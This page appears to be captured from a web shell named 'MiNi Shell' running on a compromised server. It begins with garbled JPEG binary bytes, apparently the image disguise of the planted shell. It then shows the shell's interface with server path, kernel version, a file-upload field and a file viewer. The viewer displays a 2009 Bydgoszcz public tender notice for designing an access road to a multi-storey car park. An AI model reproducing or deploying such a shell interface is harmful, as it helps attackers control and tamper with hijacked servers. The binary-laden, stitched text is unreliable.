JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090113/4122-N-2009.html

<p class="kh_header"><b>Bydgoszcz: Opracowanie dokumentacji projektowej na budowę ulicy dojazdowej do planowanego wielopoziomowego parkingu dla samochodów osobowych na działce Urzędu Miasta w Bydgoszczy przy ul. Grudziądzkiej 9-15 - PT budowa ul. Nowogrudziądzkiej.</b><br>
<b>Numer ogłoszenia: 4122 - 2009; data zamieszczenia: 13.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Miejskich i Komunikacji Publicznej , ul. Fordońska 120, 85-739 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 5822366, faks 052 5822363.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdmikp.bydgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej na budowę ulicy dojazdowej do planowanego wielopoziomowego parkingu dla samochodów osobowych na działce Urzędu Miasta w Bydgoszczy przy ul. Grudziądzkiej 9-15 - PT budowa ul. Nowogrudziądzkiej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej (projektu  budowlanego i wielobranżowego wykonawczego wraz z przedmiarami robót, kosztorysem inwestorskim i specyfikacjami technicznymi), dla budowy ulicy dojazdowej do planowanego wielopoziomowego parkingu dla samochodów osobowych na działce Urzędu Miasta w Bydgoszczy przy ul. Grudziądzkiej 9-15 (długości ok. 350 m), wraz z uzyskaniem decyzji o zezwoleniu na realizację inwestycji drogowej.
Stan istniejący
W miejscu planowanej inwestycji w chwili obecnej ulica nie istnieje. Teren w części przyległej do ulicy Grudziądzkiej nr 17, 19 zabudowany jest budynkami mieszkalnymi, usługowymi, zabudowaniami gospodarczymi. W części przyległej do skarpy jest niezagospodarowany, porośnięty krzewami i drzewami, usytuowane są tu również garaże. Ukształtowanie terenu jest urozmaicone, położenie u podnóża skarpy, powoduje występowanie znacznych spadków terenu przekraczających 5%. Na terenie przewidzianym pod budowę ulicy występuje uzbrojenie podziemne tj. kable energetyczne, ciepłociąg, sieć wodociągowa, sieć gazowa, kanalizacja sanitarna. W rejonie ul. Grudziądzkiej istnieje dodatkowo oświetlenie ulicy, kanalizacja deszczowa, sieć teletechniczna.
Stan projektowy
1) Miejscowy plan zagospodarowania przestrzennego  - Śródmieście - Grudziądzka
2) Kategoria drogi/ulicy  - gminna.
3) Klasa funkcjonalno-użytkowa - dojazdowa.
4) Przekrój poprzeczny - 1x2,  - jezdnia + obustronne chodniki.
5) Zastosować elementy uspokojenia ruchu.
6) Typy skrzyżowań - zwykłe.
7) Strefa ograniczonej prędkości - 30 km/h.
8) Szerokość w liniach rozgraniczających - 10,0 - 26,0 m.
Opracowaniem należy objąć budowę nawierzchni ulicy (jezdnia i obustronne chodniki). Projektować budowę oświetlenia ulicznego. Zaprojektować budowę kanału deszczowego i odwodnienie ulicy do projektowanej kanalizacji deszczowej. Przewidzieć należy ewentualną przebudowę istniejących urządzeń podziemnych i nadziemnych wynikającą z kolizji z projektowaną ulicą i warunków gestorów urządzeń. 
Projekt winien zawierać docelową organizację ruchu z uwzględnieniem elementów uspokojenia ruchu. 
W projekcie należy ująć:
- rozbudowę ulicy Grudziądzkiej o normatywny pas wyłączania,
- przebudowę sygnalizacji świetlnej na ul. Grudziądzkiej w zakresie umożliwienia włączenia do ruchu pojazdów wyjeżdżających z planowanego parkingu wielopoziomowego z pozostawieniem lokalizacji przejścia dla pieszych w pobliżu głównego wejścia do budynku Urzędu Miasta,
- projekt przebudowy sygnalizacji świetlnej powinien obejmować obsługę wyjazdu pojazdu uprzywilejowanego Centrum Kryzysowego.
Należy dokonać inwentaryzacji istniejącej szaty roślinnej i wykonać projekt zagospodarowania zielenią. 
W dokumentacji projektowej należy uwzględnić rozbiórkę kolidujących z budową ulicy budynków oraz uzyskać wymagane prawem pozwolenia na dokonanie rozbiórki.
Dla projektowanej budowy ulicy należy uzyskać decyzję o zezwoleniu na realizację inwestycji drogowej, na podstawie ustawy z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz.U. Nr 80, poz. 721 z późn. zm.). 
Projektować wg założeń miejscowego planu zagospodarowania przestrzennego Śródmieście - Grudziądzka.
Projektować w nawiązaniu do projektu koncepcyjnego budowy wielopoziomowego parkingu dla samochodów osobowych na działce Urzędu Miasta Bydgoszczy przy ul. Grudziądzkiej 9-15.
W ramach zamówienia Wykonawca zobowiązany będzie do:
- uzyskania podkładu geodezyjnego do celów projektowych z naniesionymi rzędnymi istniejących wjazdów na teren posesji;
- wykonania projektu budowlanego z niezbędnymi uzgodnieniami;
- wykonania projektów wykonawczych w zakresie:
- robót drogowych,
- kanalizacji deszczowej i odwodnienia nawierzchni,
- oświetlenia ulicznego,
- organizacji ruchu docelowego,
- przebudowy sygnalizacji świetlnej,
- szaty roślinnej i szczegółowej inwentaryzacji zadrzewienia wraz z gospodarką drzewostanem,
- rozbiórki budynków wraz z uzyskaniem wymaganych prawem pozwoleń,
- opracowania geotechnicznych warunków posadowienia obiektów budowlanych dla budowy ulicy,
- ewentualnej przebudowy urządzeń podziemnych i nadziemnych (tj. wodociągu, kanalizacji sanitarnej,  sieci energetycznej, gazowej, telekomunikacyjnej) wynikającej z kolizji i warunków gestorów urządzeń, zaakceptowanych przez ZDMiKP;
- sporządzenia informacji dotyczącej bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego obiektu budowlanego, uwzględnianej w planie bezpieczeństwa i ochrony zdrowia, Zgodnie z Prawem Budowlanym, ust. 20, pkt. 1, ust. 1b;
- sporządzenia szczegółowych specyfikacji technicznych wykonania i odbioru robót na podstawie aktualnie  obowiązujących Ogólnych Specyfikacji Technicznych wydanych przez Generalną Dyrekcję Dróg Krajowych i Autostrad (dla asortymentów robót nieuwzględnionych w OST sporządzić opracowania indywidualne);
- wykonania planszy zbiorczej uzbrojenia istniejącego i projektowanego- w kolorze;
- wykonania wypisów z rejestru gruntów i wykazu działek zajmowanych pod inwestycję i sąsiadujących z nią wraz naniesioną na mapę obrębową linią rozgraniczenia ulicy;
- wykonania przedmiarów robót oraz kosztorysu inwestorskiego;
- uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej.
Przy opracowaniu poszczególnych części projektu należy uwzględnić następujące zalecenia: 
- projekty wykonawcze powinny posiadać wszystkie niezbędne szczegółowe rozwiązania wynikające z przedmiotu zamówienia i niezbędne do zrealizowania zadania,
- projekt powinien posiadać wykaz opracowań oraz pisemnie oświadczenie Jednostki Projektującej, że wykonany jest zgodnie z umową, obowiązującymi normami i został wykonany w stanie kompletnym z punktu widzenia celu, któremu ma służyć,
- jednostka projektująca przekaże Zamawiającemu dokumentację w siedzibie Zamawiającego.
Części opisowe wykonane będą za pomocą komputerowego edytora tekstów kompatybilnego z MS Word, przedmiary robót  dostarczyć także w wersji elektronicznej w formacie danych kompatybilnych z MS Excel lub MS Word.
Wytyczne techniczne do opracowania dokumentacji projektowej:
1. Przed przystąpieniem do opracowania projektu należy przeprowadzić badania geotechniczne podłoża gruntowego,
2. Zamawiający upoważnia Wykonawcę do występowania w jego imieniu w sprawach  dot. uzyskania warunków technicznych od gestorów sieci i urządzeń, w sprawie uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej,
3. Rodzaj nawierzchni uzgodnić z Zamawiającym,
4. Konsultować z Zamawiającym zakres robót,
5. W początkowej fazie opracowania dokumentacji ustalić z Głównym Specjalistą ds. ruchu drogowego i Wydziałem Inżynierii Ruchu ZDMiKP szczegółowe warunki do projektowania - podstawowe dane techniczno - ruchowe, warunki do projektowania z zakresu oznakowania i urządzeń bezpieczeństwa ruchu,
6. Wykorzystać w opracowywanej dokumentacji najnowsze rozwiązania technologiczne,
7. Projekt budowlany winien uzyskać wymagane przepisami szczegółowymi opinie i uzgodnienia,
8. Uzyskać akceptację Zamawiającego dla warunków wydanych przez gestorów sieci,
9. Wszelką korespondencję w sprawach związanych z pracami projektowymi należy prowadzić z powiadomieniem Zamawiającego.
Zakres przedmiotu zamówienia:
1. Projekt budowlany - 5 kpl. 
2. Projekty wykonawcze - 5 kpl.
3. Przedmiary robót  - 5 kpl.
4. Specyfikacje techniczne - 5 egz.
5. Kosztorys inwestorski - 1 egz.
6. Decyzja o zezwoleniu na realizację inwestycji drogowej.
Elementy wskazane w pkt.1 do 5 należy dodatkowo wykonać i przekazać Zamawiającemu na nośniku elektronicznym (CD) w formacie: pdf (całość opracowania) i w formacie dgn (mapy), oraz jako dokument programu Microsoft Word (opisy techniczne, specyfikacje techniczne i przedmiary robót)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.02.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy zgodnie z art. 44 UPZP spełniają warunki udziału w postępowaniu, określone przez Zamawiającego na podstawie art. 22 ust. 1 UPZP, tj.:
1. dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia, tj. projektantami oraz projektantami sprawdzającymi rozwiązania projektowe posiadającymi: 
1) uprawnienia zawodowe do projektowania w zakresie odpowiadającym przedmiotowi zamówienia, w tym w specjalnościach: 
- drogowej, 
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych i kanalizacyjnych, 
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, 
- telekomunikacyjnej,
wymagane przepisami ustawy Prawo Budowlane (Dz. U. z 2006 r. Nr 156, poz. 1118 z późn. zm.) oraz zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dn. 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. Nr 83. poz. 578 z późn. zm.);
2) aktualne zaświadczenie o wpisie na listę właściwej Okręgowej Izby Inżynierów Budownictwa;
3) min. trzyletnie doświadczenie w projektowaniu w danej specjalności od daty uzyskania uprawnień projektowych.
2. posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia, potwierdzone wykonaniem, w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum jednej usługi w zakresie sporządzenia dokumentacji projektowej na budowę lub przebudowę ulicy o długości minimum 300 m, której elementem była kanalizacja deszczowa i oświetlenie uliczne. 	
3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj.:
 1) posiadają środki finansowe, lub zdolność kredytową w wysokości nie mniejszej niż 150.000,00 PLN (słownie: sto pięćdziesiąt tysięcy złotych 00/100),
2) posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
4. nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24  UPZP.
Sposób dokonywania oceny spełniania warunków udziału w postępowaniu.
1. Ocena spełniania warunków udziału w postępowaniu, zostanie dokonana zgodnie z kryterium spełnia/nie spełnia, na podstawie analizy dokumentów lub oświadczeń dołączonych przez Wykonawcę do oferty.
2. Oświadczenia lub dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu określonych w pkt. 10.1. SIWZ nie później niż w dniu upływu terminu składania ofert.
3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie art. 23. UPZP 
(np. konsorcjum, spółka cywilna), spełniają warunki udziału w postępowaniu w następujący sposób:
1) warunki udziału w postępowaniu określone w pkt 10.1.1., 10.1.2. i 10.1.3. SIWZ Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego spełniają łącznie,
2) warunek udziału w postępowaniu określony w pkt 10.1.4 SIWZ każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego musi spełniać oddzielnie.
4. W przypadku ubiegania się o udzielenie zamówienia z udziałem podwykonawców, warunki udziału w postępowaniu określone w pkt 10.1 SIWZ spełnia Wykonawca..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Celem potwierdzenia spełniania warunków udziału w postępowaniu, określonych w pkt. 10.1. SIWZ, Wykonawca składa przez dołączenie do oferty, w oryginale lub w formie kopii poświadczonej za zgodność z oryginałem przez Wykonawcę (tj. osobę/y uprawnioną/e do reprezentowania Wykonawcy i składania oświadczeń woli w jego imieniu) następujące oświadczenia i dokumenty: 
1. Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44 UPZP, określonych na podstawie art. 22 ust. 1 UPZP (wg wzoru Zamawiającego).
2. na potwierdzenie warunku Nr 1 (przedstawionego w pkt. 10.1.1. SIWZ):
1) uprawnienia zawodowe do projektowania, wymagane przepisami ustawy Prawo Budowlane w specjalnościach:
- drogowej, 
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych i kanalizacyjnych, 
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
- telekomunikacyjnej;
2) aktualne zaświadczenia o przynależności do właściwej Okręgowej Izby Inżynierów Budownictwa zgodnie z obowiązującymi przepisami - osób, które będą uczestniczyć w wykonaniu zamówienia;
3) wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć wykonaniu zamówienia (wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia);
4) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. 11.1.2.3) SIWZ, Wykonawca wskazał osoby, którymi będzie dysponował.
3. na potwierdzenie warunku Nr 2 (przedstawionego w pkt. 10.1.2. SIWZ):
1) wykaz wykonanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, potwierdzających spełnienie warunku udziału określonego w pkt 10.1.2. SIWZ z podaniem ich dat wykonania, przedmiotu i miejsca wykonania (wg wzoru Zamawiającego),
2) dokumenty potwierdzające - minimum jeden (np. jedna referencja), że usługi wykonane, przedstawione w ww. wykazie zostały wykonane należycie. 
4. na potwierdzenie warunku Nr 3 (przedstawionego w pkt. 10.1.3. SIWZ):
1) Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44 UPZP, określonych na podstawie art. 22 ust. 1 UPZP (wg wzoru Zamawiającego).
5. na potwierdzenie warunku Nr 4 (przedstawionego w pkt. 10.1.4. SIWZ):
1) Oświadczenie o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 UPZP (wg wzoru Zamawiającego);
2) aktualny/e odpis/y z właściwego rejestru albo aktualne zaświadczenie/a o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
 3) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składnia ofert.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie art. 23 UPZP (np.  konsorcjum, spółka cywilna) w celu potwierdzenia spełniania warunków udziału w postępowaniu dostarczają oświadczenia lub dokumenty zgodnie z zasadami:
1) oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art. 44 UPZP, określonych na podstawie art. 22 ust. 1 UPZP składa pełnomocnik do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o zamówienie;
2) każdy z wspólnie ubiegających się Wykonawców oddzielnie składa oświadczenie o niepodleganiu wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 UPZP wraz z wymaganymi dokumentami. 
Wymagane dokumenty Wykonawca składa zgodnie z przepisami rozporządzenia Prezesa Rady ministrów z dnia 19.05.2006 r. w sprawie rodzajów dokumentów, jakich zamawiający może żądać od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz.605 z późn. zm.)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdmikp.bydgoszcz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> - Zarząd Dróg Miejskich i Komunikacji Publicznej, ul. Fordońska 120, 85-950 Bydgoszcz - Cena 10,- PLN; 
- bezpłatnie na stronie internetowej: www.zdmikp.bydgoszcz.pl..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2009 godzina 10:00, miejsce: Zarząd Dróg Miejskich i Komunikacji Publicznej, 85-950 Bydgoszcz, ul. Fordońska 120, pokój nr 02 (kancelaria/parter).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami uprawnionymi do porozumiewania się z Wykonawcami są: 1. ws. merytorycznych (dot. przedmiotu i warunków realizacji zamówienia): Mariusz Antczak - tel.: 052-582-23-50., 2. ws. formalno-prawnych (dot. procedury przetargowej) Przemysław Mikołajczyk - tel.: 052-582-23-66. Termin

Creat By MiNi SheLL
Email: jattceo@gmail.com